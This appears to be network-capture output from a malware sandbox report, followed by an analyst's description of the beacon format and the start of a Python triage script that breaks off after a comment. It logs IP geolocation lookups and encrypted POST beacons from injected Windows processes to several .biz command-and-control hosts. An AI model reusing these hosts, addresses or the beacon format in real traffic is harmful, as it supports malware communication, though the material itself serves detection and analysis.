User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 28, 2024 22:44:35.056476116 CET | 778 | OUT | Data Raw: 53 90 19 6d 96 df 27 98 fe 02 00 00 51 09 7b a3 8e 11 d0 d0 9e 80 7a ea 51 83 38 17 a0 85 9f a0 c4 80 ec 96 8e 89 63 a1 d7 b3 64 ed f9 c2 8f a8 7b 99 c1 d3 e5 e1 6b c9 06 39 61 22 70 4a 6d d0 0d 6a b2 e0 cd 11 fd de f6 ba 22 5b 73 7e ab 9b 6a 84
Data Ascii: Sm'Q{zQ8cd{k9a"pJmj"[s~jiQ5GS%]os\;n!4]V AE^F@3NuZM6oF,$:#aH6T]EP*)3%=p]UB?
Nov 28, 2024 22:44:37.530086994 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Nov 2024 21:44:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c4ce88473a89f48c79dd2dfd384fc4de|8.46.123.228|1732830277|1732830277|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49754 | 132.226.247.73 | 80 | 3628 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 22:44:39.638662100 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 28, 2024 22:44:40.988693953 CET | 321 | IN | HTTP/1.1 200 OK
Date: Thu, 28 Nov 2024 21:44:40 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 1ae923c5559e27e9c9d287a34a194344
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
Nov 28, 2024 22:44:41.089533091 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 28, 2024 22:44:41.524159908 CET | 321 | IN | HTTP/1.1 200 OK
Date: Thu, 28 Nov 2024 21:44:41 GMT
Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 767e57fcd14ec5601852c7e5d3c1341c
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49780 | 172.234.222.138 | 80 | 7796 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 22:44:50.009222031 CET | 354 | OUT | POST /hndiufmakse HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 28, 2024 22:44:50.009222031 CET | 834 | OUT | Data Raw: aa e8 e3 01 e7 20 a7 ad 36 03 00 00 e8 a4 2d 31 e9 67 3a 9e ad 35 32 db 03 af 41 46 37 84 37 d9 65 f8 b7 58 25 bb db 62 99 f6 b1 2e af 6e 13 4b 17 8e 32 e7 56 df 4f 13 45 fb e7 65 68 30 e7 72 d0 b9 95 4b 15 7f 43 0e 84 c9 44 69 a1 38 d1 d3 b1 32
Data Ascii: 6-1g:52AF77eX%b.nK2VOEeh0rKCDi82;aZmNU0f<h7Nm~)C/&<9|UsT~J':$JHm Rj,@ocpk`&y6eduvT?!Vzr1^@


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49781 | 172.234.222.138 | 80 | 7880 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 22:44:50.042895079 CET | 349 | OUT | POST /hcvpcb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 28, 2024 22:44:50.042912006 CET | 778 | OUT | Data Raw: 8e a6 00 c0 08 c7 35 9a fe 02 00 00 06 44 76 93 76 2d 1f 57 bf fd e6 80 24 51 ec d1 1e d0 14 ed 9e d4 01 dc 4d ac c8 05 8c be 9f e8 87 37 f0 61 fa b0 39 e8 9b a3 00 6f 32 86 c1 f5 05 9b 25 2a a8 55 6e 6c e6 8a b4 29 c1 64 30 ec 2e 23 19 59 f8 fe
Data Ascii: 5Dvv-W$QM7a9o2%*Unl)d0.#Y_o3;i)YuDO)rc"beu*qs!>^Nd4i_C =kr1ZG{=yDJ--S-pNwX E-0{\TTV~)/?R


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49784 | 172.234.222.138 | 80 | 7796 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 22:44:51.366703033 CET | 347 | OUT | POST /lxda HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 28, 2024 22:44:51.366833925 CET | 834 | OUT | Data Raw: 03 d0 4c 5c 14 e0 8d 87 36 03 00 00 bb a5 79 ad 37 aa 03 f1 84 a0 4e a4 00 e2 e3 cd 00 4a bb 3b b9 56 f8 77 4e 3d f6 ce c7 f3 4d 36 54 70 bb 1e 1e d7 7b 17 36 e2 72 f7 4d ba d1 a5 dd ea 78 12 14 ee 75 d4 cb 28 b2 61 8a 29 c4 cc 4c b3 52 71 df 5d
Data Ascii: L\6y7NJ;VwN=M6Tp{6rMxu(a)LRq]w`'3p`Ud <!bgr]TW5@]ik~1{%NP`Vz,p]g9*k#DTDc9+)rZ]?>c9{bov|GNu&la al#


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49787 | 172.234.222.138 | 80 | 7880 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 22:44:51.504663944 CET | 351 | OUT | POST /lkgggwxh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 28, 2024 22:44:51.504663944 CET | 778 | OUT | Data Raw: 17 41 21 db 4d 09 cd 07 fe 02 00 00 ae 23 4c fb e0 ac a7 f4 07 e0 03 44 9b d2 43 e5 fa 63 df d1 70 5d 17 0d ab 47 5d 47 1b 46 5c 99 cb fc 7d 64 37 bf da 01 ce 98 cd 71 f4 9c a4 b5 2e 90 ea 60 e3 81 a5 75 15 90 b4 ac 57 78 f3 05 89 6b 5a 26 43 81
Data Ascii: A!M#LDCcp]G]GF\}d7q.`uWxkZ&C;ce?/(,Sz@QF@U4jtD@w;[G<=Lg^eU<@^gT0g>1Y>Y'"{6(Dxd


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49806 | 82.112.184.197 | 80 | 7796 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 22:45:00.638345003 CET | 350 | OUT | POST /lsfncqfq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 28, 2024 22:45:00.638411999 CET | 834 | OUT | Data Raw: 67 88 4b 7b b2 2c 0e 61 36 03 00 00 78 9f 10 67 7b f0 4f 7e 91 e9 55 92 13 85 4a 8d cb a3 a8 e2 16 ed 66 d4 31 d8 29 92 19 10 5f 2c dd a3 a5 19 e5 14 67 1c 65 1f ea 1d b5 cd 5e 7b 54 db 3d 61 27 7a f1 23 a8 05 59 3f 1d 03 1f 40 a6 7f d4 be 58 b5
Data Ascii: gK{,a6xg{O~UJf1)_,ge^{T=a'z#Y?@XERg_Mj`J39mZh('(_M+D]x0xLk-!k NCHC/P&JA> sV(UM+T91aXZ`+j7s+d;@wIU.jJHv


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 49808 | 82.112.184.197 | 80 | 7880 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 22:45:00.677488089 CET | 349 | OUT | POST /algtvyj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 28, 2024 22:45:00.677501917 CET | 778 | OUT | Data Raw: df 19 5b f8 68 f2 b6 72 fe 02 00 00 61 4f a9 ea 07 8e ba fc b6 1a 9d 1b 45 c1 47 3d c6 64 4e 60 34 15 ad 73 63 d5 00 e4 6c 83 44 34 67 02 0e c7 fa 99 48 73 ec ad 8c 0f cb f6 2d ec 1d 06 d2 81 86 d0 9c 6e 81 66 ed 3c 0e a4 92 b2 e3 e4 db 06 6f 12
Data Ascii: [hraOEG=dN`4sclD4gHs-nf<o7GZ]caTKB4U~pnrGjnq!UG~Lm^6h;C3')\96Q:*|`]!]/WVS7t 3r_'kA JL


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.7 | 49852 | 82.112.184.197 | 80 | 7796 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 22:45:22.706005096 CET | 351 | OUT | POST /oxlmrobhj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 28, 2024 22:45:22.706033945 CET | 834 | OUT | Data Raw: 08 9c 85 4b 28 f3 a4 ca 36 03 00 00 9c 20 2d b6 37 0f 2b ae 2f 06 ed 15 5c 9f 47 0e d5 3c 88 e8 14 0d 20 04 6c 91 83 9d 2b 12 14 1e 74 6b c1 c4 7f 55 c6 9e fc d0 29 45 fd 2a 1c 66 e0 8b 11 5c 4b 88 37 af 88 d7 52 fa e3 52 4e 4a 4e 59 d9 13 0b f7
Data Ascii: K(6 -7+/\G< l+tkU)E*f\K7RRNJNY``ECK.+.WU[ePw'J{s`otskEdfXI6Oqd^Wa[Q_@Zc#O,@'1w=>&"D,IyJ?mM#


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.7 | 49853 | 82.112.184.197 | 80 | 7880 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 22:45:22.716563940 CET | 350 | OUT | POST /kpnskvgb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 28, 2024 22:45:22.716583014 CET | 778 | OUT | Data Raw: e7 d6 d4 e9 2d cc de 49 fe 02 00 00 d4 c6 43 56 88 f0 20 4b 48 3e a3 60 4a 3b 20 b0 99 fb 4d 68 72 1d b6 52 02 7d 5c 64 df e0 e9 e5 9c fb 67 2e 62 90 cd 17 a5 df c6 23 01 2b 2c 8b 74 99 3f 57 73 f7 bc f7 cb c8 25 a3 a2 c5 12 95 d9 ed 88 ce a8 50
Data Ascii: -ICV KH>`J; MhrR}\dg.b#+,t?Ws%P%qK*n{z80G^P D9j?`0d$Fn/wxY'.)7ZmH$9Ij3H'0D`_\,.G{vbtNa401t7.S#


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.7 | 49864 | 82.112.184.197 | 80 | 7796 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 22:45:27.728472948 CET | 357 | OUT | POST /fmyrcucxukod HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 28, 2024 22:45:27.728472948 CET | 834 | OUT | Data Raw: cb b3 13 57 50 47 2e c7 36 03 00 00 62 4d 6f db 41 4f 04 d1 43 7c 38 28 52 97 d6 a8 b2 0b 3a 3f 76 66 d6 a1 40 38 85 41 8a 9c c3 d6 ea 98 e8 5c 31 6a 52 2a c9 49 27 c6 0e 24 2d af 99 03 89 e6 95 4b 35 75 43 de b9 82 29 c2 75 b9 ed 07 d3 88 45 d2
Data Ascii: WPG.6bMoAOC|8(R:?vf@8A\1jR*I'$-K5uC)uEcXrr1(!Y4}$_`zW?Ie9)/w,;M[0a2{l m4Cu>6l!IT|z-1j$F?/(!WZ/WCk3gCGW^_}!~M


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.7 | 49903 | 82.112.184.197 | 80 | 7880 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 22:45:45.016161919 CET | 348 | OUT | POST /rdl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 28, 2024 22:45:45.016175985 CET | 778 | OUT | Data Raw: e2 f0 33 55 a4 45 a3 f8 fe 02 00 00 fa 1e 25 e5 40 69 62 1f 78 bd 19 db 89 2f 6a e9 63 a4 b8 89 89 31 37 1a cc 84 83 00 70 ce a6 18 af 86 6b bc b9 54 5d b8 17 81 e5 6f c5 b1 aa 65 13 9e 6b ed 4e 8d 5f 9e 5e 89 be b6 cf bd 62 a2 75 ed 7f 59 89 b8
Data Ascii: 3UE%@ibx/jc17pkT]oekN_^buYP !L)@&SytJ-{ a,@}.nDd^3 !`DnB}2S9LZ:#.sT.@2V^(s.*N[G'@R


Session ID: 14
Source IP: 192.168.2.7
Source Port: 49911
Destination IP: 82.112.184.197
Destination Port: 80
PID: 7796
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 22:45:49.770873070 CET | 358 | OUT | POST /prgqqrrnmmetm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 28, 2024 22:45:49.770898104 CET | 834 | OUT | Data Raw: 6c c7 4d 28 c6 0d c3 31 36 03 00 00 d1 6f e6 92 94 67 7e 7c 97 7b 5a 14 77 19 ec 06 6a 53 56 ca ed d3 bc 69 fe b7 71 80 86 ea d1 30 69 82 65 50 34 37 dc d1 78 1d d1 7a 0b c1 11 cc 3a 9c 7d 05 3a e9 ea 5a 31 1d 43 89 7d c3 0f 9d 1b a4 72 a8 dd 00
Data Ascii: lM(16og~|{ZwjSViq0ieP47xz:}:Z1C}r{`jeoLm(E_btCRtf|6~]@{2gc0?7Q\x'[ K6Xjn)zf[`v<kY:]=5^8{$zF~jOz@xpB


Session ID: 15
Source IP: 192.168.2.7
Source Port: 49921
Destination IP: 82.112.184.197
Destination Port: 80
PID: 7880
Process: C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 22:46:07.082426071 CET | 351 | OUT | POST /oitulo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 28, 2024 22:46:07.082452059 CET | 778 | OUT | Data Raw: b5 cf 27 1b 79 20 97 dc fe 02 00 00 6f f5 2d 5a 68 18 c7 e9 0a 5d dd ca f6 76 1a 3b 18 8b 91 0b a7 1d 6f e8 0a d0 64 67 3e 06 cd eb 83 8d 5b 9d 88 cc 07 29 e6 65 98 44 d2 df 6c 82 b4 c7 6c bf f1 5c 45 c6 d0 48 0c c3 29 e2 fc cf 91 08 59 53 92 18
Data Ascii: 'y o-Zh]v;odg>[)eDll\EH)YSgA/,|g?j14+:\vy<\r9r-->\7hakJ"J~(Lb?>Z1%+I:o2J24BR'/qnY/=*l,u+


Session ID: 16
Source IP: 192.168.2.7
Source Port: 49922
Destination IP: 47.129.31.212
Destination Port: 80
PID: 7796
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 22:46:14.774070978 CET | 348 | OUT | POST /agmjd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xlfhhhm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 28, 2024 22:46:14.774086952 CET | 834 | OUT | Data Raw: 54 d7 4b 23 6e c4 0e 80 36 03 00 00 6c a1 35 c2 61 10 f3 42 2a 7b 27 5b 93 4d e6 29 a3 3d 3f 87 56 68 57 53 0c 19 6e df e3 05 1f b9 54 a9 16 a2 97 29 67 92 bf 6d 5e 98 0e d9 2c bf c0 67 26 85 a1 fc c8 52 b4 f3 e8 b5 99 17 84 b6 7c ba c2 51 9a fc
Data Ascii: TK#n6l5aB*{'[M)=?VhWSnT)gm^,g&R|QM@XHdh;60zeIvv3i7v4iAq`1:SZ\VFzr*M@C;CH(V,kREz/&KxM#l{r9a1
Nov 28, 2024 22:46:16.902856112 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Nov 2024 21:46:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=cc3e87914c68f68fb88827bb12e1c88d|8.46.123.228|1732830376|1732830376|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 0
Source IP: 192.168.2.7
Source Port: 49725
Destination IP: 104.21.67.152
Destination Port: 443
PID: 7796
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-28 21:44:30 UTC | 85 | OUT | GET /xml/8.46.123.228 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-28 21:44:30 UTC | 879 | IN | HTTP/1.1 200 OK
Date: Thu, 28 Nov 2024 21:44:30 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 93441
Last-Modified: Wed, 27 Nov 2024 19:47:09 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T0rkXpOhIe93nRGcflBv9IUNKY6N6ip9NOcRYJjZRjkqYv3jFO0n3XYpqJ8XCtRDguK%2B5yQaT0zLocYnJySJuyDR2pbvcUYHD%2BHY8H8%2BwDUXG8biXHwLtAbYDTst4%2FHzTCmxWwZ%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e9d8a257aba4414-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1987&min_rtt=1606&rtt_var=874&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1818181&cwnd=159&unsent_bytes=0&cid=fa0d1704966818c6&ts=602&x=0"
2024-11-28 21:44:30 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 1
Source IP: 192.168.2.7
Source Port: 49759
Destination IP: 104.21.67.152
Destination Port: 443
PID: 3628
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-28 21:44:44 UTC | 85 | OUT | GET /xml/8.46.123.228 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-28 21:44:44 UTC | 884 | IN | HTTP/1.1 200 OK
Date: Thu, 28 Nov 2024 21:44:44 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 93455
Last-Modified: Wed, 27 Nov 2024 19:47:09 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=505adWETdR%2BVY5nfpLNT6aDI40AqN%2F5FUu5JB7JjoSy8hLZoEVARVQlccKvrkVy1oGrsqSAAoOoVTeW3j2eP9OXIgPCN1xLOqG8%2BNYhO7EyzI6fAr8yJe%2F%2FtmnI8jPB5o8%2FYUA6%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e9d8a7d5b2c0f71-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1653&rtt_var=639&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1688837&cwnd=250&unsent_bytes=0&cid=d8af582b744f733f&ts=1774&x=0"
2024-11-28 21:44:44 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo
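The four POST beacons above (sessions 13 to 16) share one User-Agent string, short lowercase paths under short lowercase .biz hosts, carry a binary body with no Content-Type, and in every case bytes 8 to 11 of the body, read as a little-endian uint32, equal Content-Length minus 12 (0x2fe = 766 for the 778-byte bodies, 0x336 = 822 for the 834-byte ones). The two GET /xml/8.46.123.228 sessions from vbc.exe are a geolocation lookup of the sandbox's public address. The Python below is an added triage example written for this report; it is not Joe Sandbox code and not code recovered from the sample. The host and path regular expressions are analyst heuristics fitted to the six captured requests, and the sample bodies are constructed from the printed 12-byte prefixes padded with zero bytes to the declared length.

```python
"""Triage checks over the HTTP sessions captured above (added example)."""
import re
import struct
from typing import Dict, List, Optional

# Exact User-Agent carried by all four POST beacons above.
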